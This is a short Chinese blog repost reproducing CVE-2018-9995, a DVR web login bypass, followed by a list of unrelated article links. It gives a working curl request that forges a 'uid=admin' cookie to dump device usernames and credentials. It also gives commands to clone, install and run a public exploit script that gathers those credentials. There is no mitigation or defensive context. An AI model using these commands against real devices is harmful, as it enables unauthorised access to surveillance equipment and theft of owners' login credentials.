【漏洞复现】 CVE-2018-9995 DVR登陆绕过漏洞
本文共 334 字,大约阅读时间需要 1 分钟。
漏洞描述
类别:访问控制失效。访问DVR系列产品的WEB端时,设置如下cookie:uid=admin可绕过访问控制,获取设备内的用户名及登陆凭证。
漏洞利用
curl "http://ip:port/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"
EXP
git clone https://github.com/exexute/Exp.gitcd Exp/cve-2018-9995/pip3 install -r requirements.txtpython3 gather_cve2018_9995.py
效果展示
转载于:https://blog.51cto.com/executer/2137262
你可能感兴趣的文章
Hadoop 2.7.1 源代码目录结构分析
查看>>
《转》 Openstack Grizzly 指定 compute node 创建 instance
查看>>
[转]PhoneGap使用PushPlugin插件实现消息推送
查看>>
PHP传值与传址(引用)
查看>>
JSP简单练习-数组应用实例
查看>>
Directx11学习笔记【四】 封装一个简单的Dx11DemoBase
查看>>
DMA(STM32)
查看>>
最简单的基于FFMPEG的音频编码器(PCM编码为AAC)
查看>>
Boost.Asio基础(三)
查看>>
【转载】学习新东西的唯一方法
查看>>
[转]Android dex分包方案
查看>>
关于Redis的启动过程
查看>>
Android 按二次后退键退出应用程序
查看>>
Springboot监控之一:SpringBoot四大神器之Actuator之2--springboot健康检查
查看>>
[唐诗]秋夜喜遇王处士-王绩
查看>>
一个简单多任务内核实例的分析【转】
查看>>
WPF 3D 小小小小引擎 - ·WPF 3D变换应用
查看>>
又一道简单题&&Ladygod(两道思维水题)
查看>>
golang笔记——函数与方法
查看>>
Linux LVM硬盘管理及LVM扩容
查看>>